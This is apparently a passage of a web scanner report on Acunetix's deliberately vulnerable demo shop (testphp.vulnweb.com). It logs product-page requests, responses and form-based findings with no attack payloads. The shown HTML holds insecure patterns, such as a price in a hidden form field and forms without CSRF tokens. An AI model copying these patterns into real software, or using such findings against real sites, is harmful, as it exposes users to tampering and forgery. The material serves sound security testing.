<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The universe</h2><div class='story'><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $986</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='986'><input type='hidden' name='addcart' value='3'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=3 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6401 |
Response Body - size: 6,401 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The universe</h2><div class='story'><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $986</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='986'><input type='hidden' name='addcart' value='3'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name='f_addcart' method='POST' action='cart.php'> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6453 |
Response Body - size: 6,453 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Walking</h2><div class='story'><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $1000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='1000'><input type='hidden' name='addcart' value='4'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=4 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="search.php?test=query" method="post"> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6453 |
Response Body - size: 6,453 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Walking</h2><div class='story'><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $1000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='1000'><input type='hidden' name='addcart' value='4'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=5 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name='f_addcart' method='POST' action='cart.php'> |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=5 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6382 |
Response Body - size: 6,382 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mean</h2><div class='story'><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $460</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='460'><input type='hidden' name='addcart' value='5'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=5 |
Method | GET |
Parameter | |
Attack | |
